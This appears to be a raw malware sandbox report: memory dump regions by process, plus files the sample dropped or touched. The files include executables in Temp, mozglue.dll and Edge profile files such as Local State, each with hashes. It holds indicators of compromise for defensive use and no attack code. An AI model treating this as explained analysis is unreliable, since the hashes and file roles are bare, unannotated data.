SHA1 df3fbd07d9c5cb2a3e17178b1532ab7c8fc2d627
SHA256 accaf7ac1aa71774f4b9e3352005e976ba873a648b1ec24a8c4b145f646163f3
SHA512 8097f13183a002ca21e3c9b1687f841b6839a04e46ca0aa4af216f3f8fc249dca1f5406b375eaecf6bdf8e8087aaacd7066c2c2f6fe6ae9b1da9278f6ec298d5

memory/7784-650-0x00000000742A0000-0x0000000074A50000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 bd093ba8883cf9b411b84f480242a6cd
SHA1 373a3552a8848f3730e90f09fa06abe7170edf86
SHA256 7a9f3f44d0f5b802b8589103eccab5407a4ee479ac50f52295f47049cdebc29d
SHA512 0c5d0fbd9b118de2290da481dc49ecbb06495a6b80ef78eb9d5294f4b659493b2560d7594e32d50e0ff655b7ead1c1d21899c18d6ce67ff0d3de3093424d57c1

memory/7780-663-0x0000000008100000-0x0000000008166000-memory.dmp

memory/7784-677-0x0000000005680000-0x0000000005690000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 e3f8b943d4de750d757b7334d934daed
SHA1 5155f85b6315bae947da989f064b877d1b37e323
SHA256 787ba7c3d0cff12db1ebf014cfd39ac6cd28a3ce9aa1a9c5b72db7d0b48bf358
SHA512 b001f9de30322157666cea1923a886689244964c2acdc1c9bfe0e83508446791ad1b3fa0ca85a026f1f1c7631b3633f5c818219b93119b0f386ae3adbff3190e

memory/5596-695-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5596-696-0x00000000004B0000-0x000000000114C000-memory.dmp

memory/3948-700-0x000001F8AE520000-0x000001F8AE60E000-memory.dmp

memory/7780-702-0x0000000006970000-0x00000000069E6000-memory.dmp

memory/3948-704-0x000001F8C8A60000-0x000001F8C8B40000-memory.dmp

memory/3948-703-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/3948-705-0x000001F8C8B80000-0x000001F8C8B90000-memory.dmp

memory/3948-706-0x000001F8C8C00000-0x000001F8C8CE0000-memory.dmp

memory/7780-708-0x0000000006A20000-0x0000000006BE2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe

MD5 f13cf6c130d41595bc96be10a737cb18
SHA1 6b14ea97930141aa5caaeeeb13dd4c6dad55d102
SHA256 dd7aaf7ef0e5b3797eaf5182e7b192fa014b735e129e00e0c662829ce0c2515f
SHA512 ccd4f57b1af1f348fcf9f519a4789c04b499ac5e02ccb7333d0a42fa1cb1fdf9f969103b3a5467e278cd5c6cbbbbebaac4577d0c220e13335575a13408c79b48

memory/3948-712-0x000001F8C8CE0000-0x000001F8C8DA8000-memory.dmp

memory/7780-713-0x00000000089D0000-0x0000000008EFC000-memory.dmp

memory/3948-716-0x000001F8C8EB0000-0x000001F8C8F78000-memory.dmp

memory/7780-724-0x0000000008FA0000-0x0000000008FBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

MD5 6f38e2c344007fa6c5a609f3baa82894
SHA1 9296d861ae076ebddac76b490c2e56fcd0d63c6d
SHA256 fb1b0639a3bdd51f914bf71948d88555e1bbb9de0937f8fa94e7aa38a8d6ab9f
SHA512 5432ab0139ee88a7b509d60ed39d3b69f7c38fe94613b3d72cc4480112d95b2cbf7652438801e7e7956aca73d6ebc870851814bec0082f4d77737a024990e059

memory/3948-726-0x000001F8C8F80000-0x000001F8C8FCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

MD5 a98f00f0876312e7f85646d2e4fe9ded
SHA1 5d6650725d89fea37c88a0e41b2486834a8b7546
SHA256 787892fff0e39d65ccf86bb7f945be728287aaf80064b7acc84b9122e49d54e6
SHA512 f5ca9ec79d5639c06727dd106e494a39f12de150fbfbb0461d5679aed6a137b3781eedf51beaf02b61d183991d8bca4c08a045a83412525d1e28283856fa3802

C:\Users\Admin\AppData\Local\Temp\forc.exe

MD5 02d1af12b47621a72f44d2ae6bb70e37
SHA1 4e0cc70c068e55cd502d71851decb96080861101
SHA256 8d2a83ac263e56c2c058d84f67e23db8fe651b556423318f17389c2780351318
SHA512 ecf9114bbac62c81457f90a6d1c845901ece21e36ca602a79ba6c33f76a1117162175f0ace8ae6c2bdc9f962bd797ab9393316238adbc3b40a9b948d3c98582c

C:\Users\Admin\AppData\Local\Temp\latestX.exe

MD5 bae29e49e8190bfbbf0d77ffab8de59d
SHA1 4a6352bb47c7e1666a60c76f9b17ca4707872bd9
SHA256 f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87
SHA512 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2

memory/2896-749-0x00000000002C0000-0x00000000004ED000-memory.dmp

memory/7964-752-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/7780-750-0x0000000009250000-0x00000000092A0000-memory.dmp

memory/5596-754-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5168-755-0x0000000000400000-0x00000000004AA000-memory.dmp

memory/5168-758-0x000002BB5E020000-0x000002BB5E104000-memory.dmp

memory/3948-760-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/7780-759-0x00000000076E0000-0x00000000076F0000-memory.dmp

memory/7780-757-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5168-761-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/5168-762-0x000002BB5E1D0000-0x000002BB5E1E0000-memory.dmp

memory/5168-763-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-764-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-766-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-768-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-770-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-772-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-774-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-776-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-782-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-784-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-787-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/2896-786-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/5168-791-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-795-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-799-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-803-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-807-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

memory/5168-811-0x000002BB5E020000-0x000002BB5E101000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 02da3f1025dbc1d54f9ddd4d1ff36a00
SHA1 4bbd7ef89566b1b480b7e8245aaeecb5aae6a607
SHA256 1a8b93f9a9a51b3860a1e5355b527de3f47f8ec97483dacc09fa2f40d576f11b
SHA512 d265ebed62a6deea461c3307015b1047075a8a0e0dc60d5e3e25cf3dbc0dc227f9afeecad7464d7d92de74c5908258d5e42d14e9f9403e3bfd011bc8c65d372c

memory/6468-931-0x00000000008F0000-0x00000000009F0000-memory.dmp

memory/5188-936-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6468-933-0x00000000008E0000-0x00000000008E9000-memory.dmp

memory/5188-938-0x0000000000400000-0x0000000000409000-memory.dmp

memory/6588-961-0x0000000002A70000-0x0000000002E6B000-memory.dmp

memory/6588-963-0x0000000002E70000-0x000000000375B000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 b7f4e771e47e6fd5fc052a6fafce4346
SHA1 57befedb38a9df96c0edb7325c242a2b766fea34
SHA256 e7424b03140ddbfb8ede29f1e834401e32456a2b04c43a40d6d4c273a3f6aaa7
SHA512 8a033aa8fa9c565fd10630942929298ca628e04799b4bfd63b4b96fb46e26c3c45e7999cbed0a277d7604e518e6565f1e783073a74d77c288b80a83afc67e7ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 33d8b2532cc0687be454ee06c69ca651
SHA1 2a9a021ca672d3a51294295a722ed1c8424528cb
SHA256 bf29e2008cbb872e4e391123765241f3d1330e72775acfe02ae978be7178fbf9
SHA512 ce7a582525bb5c9230511812e81f7f5133e56dfa290128f6b330491b8afb519823f73f4e399280208bd08033857fa28484ceba19fa4952d2aad75be7e8f0ac78

memory/6588-980-0x0000000000400000-0x0000000000D1C000-memory.dmp

C:\ProgramData\mozglue.dll

MD5 c8fd9be83bc728cc04beffafc2907fe9
SHA1 95ab9f701e0024cedfbd312bcfe4e726744c4f2e
SHA256 ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
SHA512 fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

memory/2896-1075-0x00000000002C0000-0x00000000004ED000-memory.dmp

memory/5188-1125-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 25189300c19c8d07d07f0ec5b9ac8df0
SHA1 8c38360db6ac069df9f203b225348ac699f020b7
SHA256 80664f48abed2305dc6c625d5faabd9c6cfb91a495b3978799e29f6c686a85f6
SHA512 8ba104d264ba9f10b6c60a2a51e0fb6ded1555acca091d16899f49da1635d4372ff5c8813dc02abb0732dce6c0d529708938abd54e2fcf24cd04fb9f7301f862

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 cd57206d74e68e1f70796d0fda0bf24a
SHA1 dbdcb840eae95928031d3e99994d2cdf651ec85b
SHA256 8af9526122c3e5f3d3840c5442672e5c2240c09ed4b01d7252e931c770fbe196
SHA512 1d2b643233f4ec20715020c18fb795eb2648125462e0bfe557c991a0e0048d71c85570e37f45a20c38bc88f1f4141c6e24b1da904af08eb3ec8d21305ad5583c

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 523bee478988a73e62327ac11710ca7e
SHA1 d0efba139764d7b58c2ae126f501214c5dfa6e46
SHA256 9dc5f36219119b3a797141ebe4bb708c3a72edc196bca5aceccbcb7802f08368
SHA512 0c98c9c4fcca83217c270f4ec119d1cc067654b9f4e6f1ab9df28d8fad670d4b82157c138b754ab9520a737531128f521dae58f6e0580b2640e568f9dbb69a0d

memory/7780-1379-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/6188-1419-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

memory/6188-1426-0x000002B7E3230000-0x000002B7E3240000-memory.dmp

memory/6188-1433-0x000002B7E3340000-0x000002B7E3362000-memory.dmp

memory/6188-1431-0x000002B7E3230000-0x000002B7E3240000-memory.dmp

memory/7964-1437-0x0000000000B40000-0x0000000000B41000-memory.dmp

memory/5168-1439-0x00007FF8F2100000-0x00007FF8F2BC1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dpe1cgy1.snl.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/5168-1474-0x000002BB5E1D0000-0x000002BB5E1E0000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 58173fe330dd8c955c92d550bb196891
SHA1 646889a75fd8679d0a69df9ddf7a22b73437eb6c
SHA256 fac8f0f082b3f1cc7f84f846e3a3d87c45c65811581dce0aac495b92ca61ef20
SHA512 fd50e563ae905c0daf31c8cfa551a53eca7dfce5dda46b3b03b87e6182bad73cc9d7e6f6dd33bbcc7070ea8c803806392d67762484df4ba3459afa92a9cf4436

memory/6188-1530-0x000002B7E3230000-0x000002B7E3240000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 4216c7006058513a55cffc852b757373
SHA1 200602647bdf3a64dcab32b90ed0ac3640fe99e0
SHA256 680bf1a1085b72e9e87dd4614903ed7668302169ccdecf1f1a4aa4c5875aca52
SHA512 f73233d141d2f36641d79eca39e4a68373216f4c6c2670b15595c2cbfebf23dd510dbd3d2155edc9178fab414d317a97aa70f8576ff8f4cdbbb68ed06be5ea45

memory/5336-1606-0x00000000742A0000-0x0000000074A50000-memory.dmp

memory/5336-1610-0x0000000004690000-0x00000000046C6000-memory.dmp

memory/6588-1613-0x0000000002A70000-0x0000000002E6B000-memory.dmp

memory/5336-1616-0x0000000004680000-0x0000000004690000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3